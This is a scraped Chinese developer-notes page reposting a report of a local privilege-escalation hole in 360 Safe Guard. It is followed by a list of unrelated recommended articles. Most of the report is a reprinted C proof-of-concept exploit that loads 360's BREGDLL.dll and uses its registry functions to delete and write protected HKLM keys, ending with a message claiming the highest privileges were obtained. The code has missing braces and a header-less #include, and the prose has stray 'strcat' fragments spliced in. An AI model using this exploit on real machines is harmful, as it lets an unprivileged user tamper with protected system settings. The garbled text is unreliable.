当前位置: 开发笔记 > 编程语言 > 正文

360安全卫士被曝“本地提权”漏洞数月未修复

作者：疯务情堂 | 来源：互联网 | 2023-06-19 21:31

360安全卫士被曝“本地提权”漏洞数月未修复　　2月1日，有网友在百度知道搜索发现，奇虎360安全卫士存在本地提权漏洞，经瑞星互联网攻防实验室验证确认，该漏洞确实存在，并影响360安全卫士全部版本st

　　2月1日，有网友在百度知道搜索发现，奇虎360安全卫士存在本地提权漏洞，经瑞星互联网攻防实验室验证确认，该漏洞确实存在，并影响360安全卫士全部版本strcat。

　　请大家注意.

　　　　附2:后门利用程序

　　　　#include

　　　　typedef BOOL (WINAPI *INIT_REG_ENGINE)();

　　　　typedef LONG (WINAPI *BREG_DELETE_KEY)(HKEY hKey, LPCSTR lpSubKey);

　　　　typedef LONG (WINAPI *BREG_OPEN_KEY)(HKEY hKey, LPCSTR lpSubKey, PHKEY phkResult);

　　　　typedef LONG (WINAPI *BREG_CLOSE_KEY)(HKEY hKey);

　　　　typedef LONG (WINAPI *REG_SET_VALUE_EX)(HKEY hKey, LPCSTR lpValueName, DWORD Reserved, DWORD dwType, const BYTE* lpData, DWORD cbData);

　　　　BREG_DELETE_KEY BRegDeleteKey = NULL;

　　　　BREG_OPEN_KEY BRegOpenKey = NULL;

　　　　BREG_CLOSE_KEY BRegCloseKey = NULL;

　　　　REG_SET_VALUE_EX BRegSetValueEx = NULL;

　　　　#define AppPath "Software\\Microsoft\\Windows\\CurrentVersion\\App Paths\\360safe.exe"

　　　　#define TestDeleteKey HKEY_LOCAL_MACHINE

　　　　#define TestDeleteRegPath "Software\\360Safe\\Update"

　　　　#define TestSetKey HKEY_LOCAL_MACHINE

　　　　#define TestSetPath "Software\\360Safe"

　　　　BOOL InitBRegDll()

　　　　LONG lResult;

　　　　HKEY hKey;

　　　　CHAR cPath[MAX_PATH + 32] = { 0 };

　　　　DWORD dwPathLen = MAX_PATH;

　　　　lResult = RegOpenKeyA(HKEY_LOCAL_MACHINE, AppPath, &hKey);

　　　　if (FAILED(lResult))

　　　　return FALSE;

　　　　DWORD dwType = REG_SZ;

　　　　lResult = RegQueryValueExA(hKey, "Path", NULL, &dwType, (LPBYTE)cPath, &dwPathLen);

　　　　RegCloseKey(hKey);

　　　　if (FAILED(lResult))

　　　　return FALSE;

　　　　strcat(cPath, "\\deepscan\\BREGDLL.dll");

　　　　HMODULE modBReg = LoadLibraryA(cPath);

　　　　if (!modBReg)

　　　　return FALSE;

　　　　INIT_REG_ENGINE InitRegEngine = (INIT_REG_ENGINE)GetProcAddress(modBReg, "InitRegEngine");

360安全卫士被曝“本地提权”漏洞数月未修复

　　　　BRegDeleteKey = (BREG_DELETE_KEY)GetProcAddress(modBReg, "BRegDeleteKey");

　　　　BRegOpenKey = (BREG_OPEN_KEY)GetProcAddress(modBReg, "BRegOpenKey");

　　　　BRegCloseKey = (BREG_CLOSE_KEY)GetProcAddress(modBReg, "BRegCloseKey");

　　　　BRegSetValueEx = (REG_SET_VALUE_EX)GetProcAddress(modBReg, "BRegSetValueEx");

　　　　if (!InitRegEngine || !BRegDeleteKey || !BRegOpenKey || !BRegCloseKey || !BRegSetValueEx) {

　　　　FreeLibrary(modBReg);

　　　　return FALSE;

　　　　if (!InitRegEngine()) {

　　　　FreeLibrary(modBReg);

　　　　return FALSE;

　　　　return TRUE;

360安全卫士被曝“本地提权”漏洞数月未修复

　　　　LONG TestSetRegKey()

　　　　HKEY hKey;

　　　　LONG lResult;

　　　　lResult = BRegOpenKey(TestSetKey, TestSetPath, &hKey);

　　　　if (FAILED(lResult))

　　　　return lResult;

　　　　DWORD dwType = REG_SZ;

　　　　static char szData[] = "TEST VALUE";

　　　　lResult = BRegSetValueEx(hKey, TestSetPath, NULL, dwType, (const BYTE *)&szData, (DWORD)sizeof(szData));

　　　　BRegCloseKey(hKey);

　　　　return lResult;

　　　　int main(int argc, char *argv[])

　　　　if (!InitBRegDll()) {

　　　　MessageBoxA(NULL, "初始化BReg失败!", "失败", MB_ICONSTOP);

　　　　return 1;

　　　　if (FAILED(BRegDeleteKey(TestDeleteKey, TestDeleteRegPath))) {

　　　　MessageBoxA(NULL, "键值删除失败!", "失败", MB_ICONSTOP);

　　　　return 2;

　　　　if (FAILED(TestSetRegKey())) {

　　　　MessageBoxA(NULL, "设置键值失败!", "失败", MB_ICONSTOP);

　　　　return 3;

　　　　MessageBoxA(NULL, "突破系统安全检查strcat，获得最高权限，漏洞利用成功!", "成功", MB_OK);

　　　　return 0;

　　很多站都有,不知道是不是....大家小心strcat。

推荐阅读

list
SpringBoot uri统一权限管理的实现方法及步骤详解

本文详细介绍了SpringBoot中实现uri统一权限管理的方法，包括表结构定义、自动统计URI并自动删除脏数据、程序启动加载等步骤。通过该方法可以提高系统的安全性，实现对系统任意接口的权限拦截验证。 ... [详细]

蜡笔小新 2023-12-14 16:11:30
list
获取当前模块所在路径的GetModuleFileName函数用法详解

本文详细介绍了GetModuleFileName函数的用法，该函数可以用于获取当前模块所在的路径，方便进行文件操作和读取配置信息。文章通过示例代码和详细的解释，帮助读者理解和使用该函数。同时，还提供了相关的API函数声明和说明。 ... [详细]

蜡笔小新 2023-12-14 19:29:57
list
GetWindowLong函数

今天在看一个代码里头写了GetWindowLong(hwnd,0)，我当时就有点费解，靠，上网搜索函数原型说明，死活找不到第 ... [详细]

蜡笔小新 2023-12-14 17:58:15
bit
伊振华作品 | 沈阳市智慧城市运行管理中心的设计与建设

本文介绍了设计师伊振华受邀参与沈阳市智慧城市运行管理中心项目的整体设计，并以数字赋能和创新驱动高质量发展的理念，建设了集成、智慧、高效的一体化城市综合管理平台，促进了城市的数字化转型。该中心被称为当代城市的智能心脏，为沈阳市的智慧城市建设做出了重要贡献。 ... [详细]

蜡笔小新 2023-12-14 16:35:39
import
Java容器中的compareto方法排序原理解析

本文从源码解析Java容器中的compareto方法的排序原理，讲解了在使用数组存储数据时的限制以及存储效率的问题。同时提到了Redis的五大数据结构和list、set等知识点，回忆了作者大学时代的Java学习经历。文章以作者做的思维导图作为目录，展示了整个讲解过程。 ... [详细]

蜡笔小新 2023-12-14 13:53:31
import
Java实现大数乘法（分治算法）

本文介绍了使用Java实现大数乘法的分治算法，包括输入数据的处理、普通大数乘法的结果和Karatsuba大数乘法的结果。通过改变long类型可以适应不同范围的大数乘法计算。 ... [详细]

蜡笔小新 2023-12-14 15:43:50
import
Backwardsincompatible change made.

Commit1ced2a7433ea8937a1b260ea65d708f32ca7c95eintroduceda+Clonetraitboundtom ... [详细]

蜡笔小新 2023-12-14 15:35:09
bit
C#生成随机数的三种方法及其问题分析

本文介绍了C#中生成随机数的三种方法，并分析了其中存在的问题。首先介绍了使用Random类生成随机数的默认方法，但在高并发情况下可能会出现重复的情况。接着通过循环生成了一系列随机数，进一步突显了这个问题。文章指出，随机数生成在任何编程语言中都是必备的功能，但Random类生成的随机数并不可靠。最后，提出了需要寻找其他可靠的随机数生成方法的建议。 ... [详细]

蜡笔小新 2023-12-14 14:15:30
list
Redis数据结构之string应用场景解析

本文介绍了Redis的基础数据结构string的应用场景，并以面试的形式进行问答讲解，帮助读者更好地理解和应用Redis。同时，描述了一位面试者的心理状态和面试官的行为。 ... [详细]

蜡笔小新 2023-12-14 14:02:42
import
如何在有序字符序列中插入新字符并保持有序

本文介绍了如何在给定的有序字符序列中插入新字符，并保持序列的有序性。通过示例代码演示了插入过程，以及插入后的字符序列。 ... [详细]

蜡笔小新 2023-12-14 11:16:33
list
eclipse学习（第三章：ssh中的Hibernate）——11.Hibernate的缓存（2级缓存，get和load）

本文介绍了eclipse学习中的第三章内容，主要讲解了ssh中的Hibernate的缓存，包括2级缓存和get方法、load方法的区别。文章还涉及了项目实践和相关知识点的讲解。 ... [详细]

蜡笔小新 2023-12-14 00:31:35
list
计算机存储系统的层次结构及其优势

本文介绍了计算机存储系统的层次结构，包括高速缓存、主存储器和辅助存储器三个层次。通过分层存储数据可以提高程序的执行效率。计算机存储系统的层次结构将各种不同存储容量、存取速度和价格的存储器有机组合成整体，形成可寻址存储空间比主存储器空间大得多的存储整体。由于辅助存储器容量大、价格低，使得整体存储系统的平均价格降低。同时，高速缓存的存取速度可以和CPU的工作速度相匹配，进一步提高程序执行效率。 ... [详细]

蜡笔小新 2023-12-13 17:32:41
list
Python正则表达式学习记录及常用方法

本文记录了学习Python正则表达式的过程，介绍了re模块的常用方法re.search，并解释了rawstring的作用。正则表达式是一种方便检查字符串匹配模式的工具，通过本文的学习可以掌握Python中使用正则表达式的基本方法。 ... [详细]

蜡笔小新 2023-12-13 16:37:19
uri
自动轮播，反转播放的ViewPagerAdapter的使用方法和效果展示

本文介绍了如何使用自动轮播、反转播放的ViewPagerAdapter，并展示了其效果。该ViewPagerAdapter支持无限循环、触摸暂停、切换缩放等功能。同时提供了使用GIF.gif的示例和github地址。通过LoopFragmentPagerAdapter类的getActualCount、getActualItem和getActualPagerTitle方法可以实现自定义的循环效果和标题展示。 ... [详细]

蜡笔小新 2023-12-13 14:41:31
list
SpringJdbcTemplate的使用详解

本文详细介绍了Spring的JdbcTemplate的使用方法，包括执行存储过程、存储函数的call()方法，执行任何SQL语句的execute()方法，单个更新和批量更新的update()和batchUpdate()方法，以及单查和列表查询的query()和queryForXXX()方法。提供了经过测试的API供使用。 ... [详细]

蜡笔小新 2023-12-13 14:27:11

疯务情堂

这个家伙很懒，什么也没留下！

Tags | 热门标签

RankList | 热门文章